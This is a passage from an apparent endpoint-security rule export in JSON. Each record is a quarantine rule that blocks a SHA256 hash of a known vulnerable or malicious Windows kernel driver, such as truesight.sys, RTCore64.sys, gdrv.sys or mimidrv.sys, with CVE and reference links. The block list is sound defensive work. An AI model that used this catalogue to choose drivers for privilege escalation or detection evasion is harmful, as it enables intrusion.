"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974575Z", + "creation_date": "2026-03-23T11:45:29.974577Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974582Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9bea1a92c747c203cd3e370f422ed6023787817a5495385e5ca473ef59396a2e", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a7df18d-1b7d-517a-b992-0deae3d4c736", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824562Z", + "creation_date": "2026-03-23T11:45:30.824564Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824572Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a05a5e4ef61ca36ec26c307986f97ddacdf0b8c6d49ba585af7f6c1418e15580", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a875926-b743-5bf0-95bc-90d0d60352a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474546Z", + "creation_date": "2026-03-23T11:45:31.474550Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474560Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9fc59fa28750eca8c9b1d0430f8dae06fb47a23ae5ccaf00382ff39404dd0ce3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a87b0e1-2b4b-5f7f-b853-ca10d1ee5d40", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489074Z", + "creation_date": 
"2026-03-23T11:45:31.489076Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489082Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b300090af83ca99586f57e7866152c457ff04845af365b1b556f26b827f07c2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a8d8298-13c9-555f-8d45-667e01396666", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465029Z", + "creation_date": "2026-03-23T11:45:30.465032Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465041Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "beef40f1b4ce0ff2ee5c264955e6b2a0de6fe4089307510378adc83fad77228b", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a901fd4-accf-5903-9b5f-842ca54d511e", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146583Z", + "creation_date": "2026-03-23T11:45:31.146585Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146590Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2379c61d731ca8c5b2e37b59829ab936cb89b399dcd0704bf3e5b6623a94aa74", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a94a125-7f03-5ae0-8b14-aa7ad9fe6e7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500761Z", + "creation_date": "2026-03-23T11:45:31.500765Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.500773Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b13a2984b2010516a393de79655ee50b11c820e81c3d48c77994f6ae158e264e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a975e71-e4b7-5ae0-a002-bf1d7a4df225", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472664Z", + "creation_date": "2026-03-23T11:45:30.472668Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472677Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8e92aacd60fca1f09b7257e62caf0692794f5d741c5d1eec89d841e87f2c359c", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a9e8640-da7b-509c-9409-e448da121355", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472349Z", + "creation_date": "2026-03-23T11:45:31.472352Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472360Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dc21d405f62d38621816523ef0d56479bcc72b7713a133d14b304db037727f74", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5aa9af00-e2ad-54f6-a877-2d0fe8fa2861", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472438Z", + "creation_date": "2026-03-23T11:45:31.472441Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472450Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"e80b9e2396917ea371114060a132279a1392cfa311c0980b96b5ba0e523e047f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ab4f810-e734-5349-98f1-78e936ac28ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828472Z", + "creation_date": "2026-03-23T11:45:30.828474Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828479Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8c01f61d0a03d2a02107e921f8f23884cf053c5f5be991b5136d6958ffd94863", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ab8913d-ade1-5174-8bac-5f220c4aca6e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981908Z", + "creation_date": "2026-03-23T11:45:29.981910Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981916Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3e507e713f11901017fc328186ae98e23de7cea5594687480229f77d45848d8", + "comment": "Vulnerable Kernel Driver (aka b1.sys) [https://www.loldrivers.io/drivers/69b924ab-2e4a-4eae-8091-4151c238136e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ab8d85b-61af-50a7-bffc-510e23430e23", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609482Z", + "creation_date": "2026-03-23T11:45:29.609488Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609493Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb0063e65c44da66d705d25121af09b641070219c174f5d83e288ba8fe59e46f", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "5abb8057-4929-5291-8210-9bf1c36b9d57", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811524Z", + "creation_date": "2026-03-23T11:45:31.811526Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811532Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "701a88235e70f19461935f0fbfd4bcecdf654c0b91b20b0a968b0e7d9b40713c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ad75cc5-a900-5a39-ac3c-59098e7bf83a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620693Z", + "creation_date": "2026-03-23T11:45:29.620695Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620700Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "84bf1d0bcdf175cfe8aea2973e0373015793d43907410ae97e2071b2c4b8e2d4", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5add6a82-ff79-568a-80d8-0c2de6a824dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821499Z", + "creation_date": "2026-03-23T11:45:30.821503Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821511Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13ae3081393f8100cc491ebb88ba58f0491b3550787cf3fd25a73aa7ca0290d9", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5aedb076-01ca-5528-a5c1-2c15cbf4fd6e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148154Z", + "creation_date": "2026-03-23T11:45:31.148157Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148166Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37f755dcb733a06bbc90206da0ca94078e237cb0602d4050f7679946b6f93738", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5af9d7b9-034b-554e-9302-ac2c8e3e21bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470461Z", + "creation_date": "2026-03-23T11:45:30.470465Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470474Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "9718a5e78f5015a7a9f66c33ae31a6df37535f33039380c6edc103e3a9dbc5ab", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5afc9956-b8ac-543f-979a-c4031cfa1d67", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813195Z", + "creation_date": "2026-03-23T11:45:31.813198Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813205Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd717e3f0cbdcd839a816d133f07b331f6219259071e33fb8ba7f0a6258d56a5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5afc9eaf-a71f-5a70-a191-06b6cefe6be6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155906Z", + "creation_date": "2026-03-23T11:45:31.155908Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155914Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "99a7c55161c2d016cc3eb8ce3265adeddb877692642940207ca5de6a703c0a19", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b041cd6-35ba-5989-a51a-e4d82ad9bd37", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144688Z", + "creation_date": "2026-03-23T11:45:32.144690Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144696Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8248306bcc5fae20fd4f3d5c44f962c85cddbe020b34a1799350ce2034154b7d", + "comment": "Malicious Kernel Driver (aka windivert.sys) 
[https://www.loldrivers.io/drivers/45a31a17-f78d-48ec-beba-74f6bfc5f96e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b07790c-7e11-59dd-a07c-17410bd4f478", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460794Z", + "creation_date": "2026-03-23T11:45:30.460798Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460806Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7a61c671eab1dfaa62fe1088a85f6d52fb11f2f32a53822a49521ca2c16585e", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b0cb0a5-44ea-5019-a4bb-6575ec428c0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479475Z", + "creation_date": "2026-03-23T11:45:30.479477Z", + "enabled": true, + "block_on_agent": 
true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479483Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee8ee16198dd8eec8d5fbb7f98f64bb849b2dfcf652cc102f4cdc63a4551549f", + "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b180cca-d32d-5a97-8a19-39ef0930801e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453842Z", + "creation_date": "2026-03-23T11:45:30.453845Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453855Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11dcfa779763dd6e26344b32dd779bb49be470a7b9b43b5f03738c17fed06aa8", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b1f520f-251e-5247-a7d0-d3cdf941edc0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", 
+ "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968458Z", + "creation_date": "2026-03-23T11:45:29.968460Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968465Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "033a14d3863dcb5b990788697a1096fd1f03586694b7872bb47826953f69c9f0", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b20b6cd-95f1-5be4-8e81-17f616783845", + "test_maturity_current_count": 0, + 